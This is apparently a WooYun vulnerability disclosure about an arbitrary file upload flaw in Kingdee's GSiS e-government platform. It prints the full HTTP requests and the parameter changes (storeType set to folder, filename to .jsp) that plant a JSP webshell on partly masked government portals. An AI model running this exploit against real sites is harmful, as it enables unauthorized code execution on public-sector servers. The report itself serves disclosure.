漏洞标题 金蝶政务GSiS服务平台通用上传漏洞
相关厂商 金蝶
漏洞作者 路人甲
提交时间 2014-07-22 19:57
公开时间 2014-10-20 19:58
漏洞类型 文件上传导致任意代码执行
危害等级
自评Rank 20
漏洞状态 厂商已经确认
Tags标签 任意文件上传

漏洞详情

问题:上传页面多数参数可控,导致任意文件上传,且有越权访问会员外功能问题。

收集到的案例有:

高平市政务中心

http://gk.sx******.gov.cn:8080/kdgs/

汉川政务中心

http://www.han****.gov.cn:8080/kdgs

等等

通杀所有金蝶GSIS

漏洞证明:

本次演示地址为:

http://gk.sx******.gov.cn:8080/kdgs

漏洞地址:http://gk.sx******.gov.cn:8080/kdgs/portal/share/upload/uploadFile.jsp

第一步:

注册并登录网站会员获取合法会话标识

注册地址

http://gk.sx******.gov.cn:8080/kdgs/biz/portal/user/regist.action?registUserType=

如果页面找不到注册按钮的可以直接替换页面找到注册地址。

第二步:

访问文件上传页面,利用burpsuite代理进行上传

正常上传POST请求为

code 区域
POST /kdgs/biz/portal/upload/upload.action HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://gk.sx******.gov.cn:8080/kdgs/portal/share/upload/uploadFile.jsp?path=ITEM_PATH&maximumSize=3145728&fileSaveMode=00&storeType=db&refreshTimestamp=1405994496640
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Content-Type: multipart/form-data; boundary=---------------------------7def0302c2
Accept-Encoding: gzip, deflate
Host: gk.sx******.gov.cn:8080
Content-Length: 1502
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=B247935EBA2FB9FE9B4C4506A4646D45; __userType__cookie=INNER

-----------------------------7def0302c2
Content-Disposition: form-data; name="id"


-----------------------------7def0302c2
Content-Disposition: form-data; name="viewid"


-----------------------------7def0302c2
Content-Disposition: form-data; name="path"

ITEM_PATH
-----------------------------7def0302c2
Content-Disposition: form-data; name="fileSaveMode"

00
-----------------------------7def0302c2
Content-Disposition: form-data; name="uploadList_"


-----------------------------7def0302c2
Content-Disposition: form-data; name="fieldValue"


-----------------------------7def0302c2
Content-Disposition: form-data; name="allowedTypes"


-----------------------------7def0302c2
Content-Disposition: form-data; name="maximumSize"

3145728
-----------------------------7def0302c2
Content-Disposition: form-data; name="storeType"

db
-----------------------------7def0302c2
Content-Disposition: form-data; name="fieldid"


-----------------------------7def0302c2
Content-Disposition: form-data; name="file"; filename="3.gif"
Content-Type: image/gif

wooyun
-----------------------------7def0302c2
Content-Disposition: form-data; name="filename"

C:\fakepath\3.gif
-----------------------------7def0302c2
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream


-----------------------------7def0302c2
Content-Disposition: form-data; name="filename"


-----------------------------7def0302c2--

修改storeType的值db为folder

修改filename的值为XX.jsp

2.png

修改后的POST数据包为

code 区域
POST /kdgs/biz/portal/upload/upload.action HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://gk.sx******.gov.cn:8080/kdgs/portal/share/upload/uploadFile.jsp?path=ITEM_PATH&maximumSize=3145728&fileSaveMode=00&storeType=db&refreshTimestamp=1405994496640
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Content-Type: multipart/form-data; boundary=---------------------------7def0302c2
Accept-Encoding: gzip, deflate
Host: gk.sx******.gov.cn:8080
Content-Length: 1502
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=B247935EBA2FB9FE9B4C4506A4646D45; __userType__cookie=INNER

-----------------------------7def0302c2
Content-Disposition: form-data; name="id"


-----------------------------7def0302c2
Content-Disposition: form-data; name="viewid"


-----------------------------7def0302c2
Content-Disposition: form-data; name="path"

ITEM_PATH
-----------------------------7def0302c2
Content-Disposition: form-data; name="fileSaveMode"

00
-----------------------------7def0302c2
Content-Disposition: form-data; name="uploadList_"


-----------------------------7def0302c2
Content-Disposition: form-data; name="fieldValue"


-----------------------------7def0302c2
Content-Disposition: form-data; name="allowedTypes"


-----------------------------7def0302c2
Content-Disposition: form-data; name="maximumSize"

3145728
-----------------------------7def0302c2
Content-Disposition: form-data; name="storeType"

folder
-----------------------------7def0302c2
Content-Disposition: form-data; name="fieldid"


-----------------------------7def0302c2
Content-Disposition: form-data; name="file"; filename="3.gif"
Content-Type: image/gif

wooyun
-----------------------------7def0302c2
Content-Disposition: form-data; name="filename"

C:\fakepath\3.jsp
-----------------------------7def0302c2
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream


-----------------------------7def0302c2
Content-Disposition: form-data; name="filename"


-----------------------------7def0302c2--

上传成功后得到

2214090909734adf55858a24ca2745e921f09f4c.png

webshell地址为

http://gk.sx******.gov.cn:8080/kdgs/uploads/item/11e4-1165-d78d7b5a-ba69-331a1d69f888.jsp

11e4-1165-d78d7b5a-ba69-331a1d69f888.jsp是随机的,看burpsuite回显。

22141009dd5c045a79425a4decd5bb2b0eeedd89.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云

转载请注明:安全脉搏 » 金蝶政务GSiS服务平台通用上传漏洞